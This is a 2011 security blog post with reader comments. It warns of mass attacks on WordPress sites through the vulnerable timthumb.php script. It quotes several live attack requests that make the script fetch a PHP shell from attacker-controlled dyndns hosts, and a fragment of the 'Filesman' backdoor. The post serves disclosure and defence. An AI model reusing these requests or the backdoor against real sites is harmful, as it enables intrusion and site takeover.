• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Attacks Against Timthumb.php in the Wild – List of Themes and Plugins Being Scanned

August 17, 2011David Dede

FacebookTwitterSubscribe

We are seeing large scale attacks against the vulnerable timthumb.php script in the wild. Thousands of sites are getting compromised and if you have it in your WordPress site, you better get it fixed right now!

After a few days analyzing the compromised sites and many log files, here are the plugins we’ve seen getting scanned by the attackers (total of 25):

Here are the themes we’ve seen scanned (total of 45):

If you have any of these installed on your site, please verify them for the TimThumb script. If they contain the script ensure it is updated immediately.

Attacks in the wild

We are seeing many attacks in the wild, basically they scan all these plugins and themes, then attempt to compromise the site.

Here is a type of request they will make:

GET /wp-content/plugins/wordpress-gallery-plugin/timthumb.php?src=http://picasa.com12345.dyndns.org/1.php

Did you catch that? They created a fake domain on dyndns, called picasa.com123435.dyndns.org and used that to upload a PHP shell.

Another types of attacks will looks like that:

GET /wp-content/plugins/igit-posts-slider-widget/timthumb.php?src=http://a57fc3picasa.complex.dyndns-pics.com/pics/pics.php
GET /wp-content/plugins/igit-posts-slider-widget/timthumb.php?src=http://adcb293eb4a6efa757baca4c6efd6picasa.complex.dyndns-pics.com/pics/pics.php
GET /wp-content/plugins/igit-posts-slider-widget/timthumb.php?src=http://a9d4b9a85d79f02f2picasa.commandos7.dyndns.info/pics/pics.php

This time using a57fc3picasa.complex.dyndns-pics.com/pics/pics.php to upload the backdoor on to the site.

When you check for these backdoors, they are the standard “Filesman” backdoor:

<?php $auth_pass = "47a85"."6c68".”e623468d84123″.”e87881d1e3″;$color = “#df5”;$default_action = "File".’sMa’.’n’;$default_use_ajax = true;$default_charset = ‘Windows-‘.’1251’;…

As you can see, they are very easy to execute (a simple GET) and can really damage your site. Now, it’s time to take action!

If you are not sure if your site is compromised already, you can scan it using Sucuri SiteCheck. If you need help, sign up here and we can fix/secure your site for you.

FacebookTwitterSubscribe

Categories: Vulnerability Disclosure, Website Malware Infections, WordPress SecurityTags: Hacked Websites, Malware Updates

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. Genevieve Gelinas

    August 18, 2011

    The Specialist theme by Templatic was using it also.

  2. Lucas Shaffer

    August 18, 2011

    Check the index.php filein the root for a PHP redirect.  Not sure where else this could have modified files.

    Anyone else?

    • Idontworkhere

      August 29, 2011

      The one I saw appended a block of obfuscated code to every jquery.js – including one that was outside wordpress.

  3. agcyphers

    August 19, 2011

    Need to add the “Envision” plugin by ThemeFuse to the list.

  4. DukaPress

    August 23, 2011

    Hi, this is Kelvin, co-founder of DukaPress.  We wish to report that our plugin was updated a few weeks ago to fix the timthumb security hole. Here: http://dukapress.org/blog/2011/08/09/dukapress-2-3-3-timthumb-security-update/

  5. ARMYWTFMOMENTS

    August 26, 2011

    BoldNews by woo themes
    Was affected as well

  6. Mike

    August 30, 2011

    I was just scanned, here is the list I compiled from the log file.
     http://www.big-webmaster.com/themes-scanned-timthumb-vulerability/

  7. Peter

    September 16, 2011

    You can also add the themes Branford Magazine, Tribune
    and plugin: WordPress Popular Posts

  8. Theroamingpint

    October 27, 2011

    I use the WooTheme Listings and was hacked. Luckily you guys helped to clean it right up but I still don’t understand what all these hacks mean. What does this “malicious code” do for anyone? I’m starting to convince myself companies like Woo and Sucuri are making these hacks just so they can make more money. In all honesty I don’t really believe that, but it does seem convenient. Anyone care to shed more light on the subject for me?

  9. SeanFromIT

    December 6, 2011

    The Unstandard theme (http://5thirtyone.com/the-unstandard) uses timthumb, but it has not been hacked yet as far as I know.

  10. Adam Walker Cleaveland

    December 8, 2011

    Chris Pearson’s “Thesis” theme is the one that’s affected out of all of my sites. 

  11. Bagus Ariyanto W

    March 15, 2012

    Fix your WordPress themes with httacces in here
    http://baguzajja.info/how-to-fix-wordpress-vulnerabilities-from-timthumb-php

  12. sysadmin

    May 8, 2012

    Yes, I also see lots of such queries in my logs of wordpress sites. Luckily, I don’t use themes with timthumb.

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.